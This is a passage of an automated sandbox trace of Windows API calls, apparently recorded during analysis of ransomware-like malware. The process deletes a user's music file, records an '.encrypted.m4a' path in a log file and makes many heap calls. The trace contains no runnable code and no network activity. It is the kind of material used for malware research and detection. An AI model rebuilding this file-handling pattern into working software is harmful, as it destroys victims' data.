lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0038.978] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0038.978] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.979] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.979] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.979] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.979] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.979] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.979] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.980] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", lpFilePart=0x0) returned 0x40 [0038.980] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4623dd80, ftCreationTime.dwHighDateTime=0x1d5ba60, ftLastAccessTime.dwLowDateTime=0xb95244e0, ftLastAccessTime.dwHighDateTime=0x1d5b5f1, ftLastWriteTime.dwLowDateTime=0x16f190a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xec62, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="BT6E6z.m4a", cAlternateFileName="")) returned 0x7c2100 [0038.981] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zpoe-x9xwzebvppnc\\bt6e6z.m4a")) returned 1 [0038.982] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4623dd80, ftCreationTime.dwHighDateTime=0x1d5ba60, ftLastAccessTime.dwLowDateTime=0xb95244e0, ftLastAccessTime.dwHighDateTime=0x1d5b5f1, ftLastWriteTime.dwLowDateTime=0x16f190a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xec62, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="BT6E6z.m4a", cAlternateFileName="")) returned 0 [0038.982] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.982] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.982] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.982] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.982] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0038.982] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0038.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0038.983] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0038.983] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.983] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.983] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0038.983] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0038.983] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.983] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0038.983] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.983] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0038.984] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.984] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0038.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0038.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.984] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0038.984] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x275d, lpOverlapped=0x0) returned 1 [0038.984] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0038.984] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x275d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0038.984] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0038.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0010 | out: hHeap=0x770000) returned 1 [0038.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0038.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.encrypted.m4a\r\n", cchWideChar=77, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 77 [0038.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4d) returned 0x7f36e0 [0038.984] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.encrypted.m4a\r\n", cchWideChar=77, lpMultiByteStr=0x7f36e0, cbMultiByte=77, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\zpoE-x9XwzeBvpPNc\\BT6E6z.encrypted.m4a\r\n", lpUsedDefaultChar=0x0) returned 77 [0038.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0038.984] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0038.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f36e0 | out: hHeap=0x770000) returned 1 [0038.984] WriteFile (in: hFile=0x140, lpBuffer=0x7f3630*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7f3630*, lpNumberOfBytesWritten=0x6aee3c*=0x4c, lpOverlapped=0x0) returned 1 [0038.984] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.985] CloseHandle (hObject=0x140) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0038.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.986] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0038.986] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.987] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0038.987] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.987] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.987] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af368 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0038.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0038.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0038.988] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0038.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0038.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0038.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0038.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0038.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.988] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.989] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0038.989] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.989] HeapFree (in: 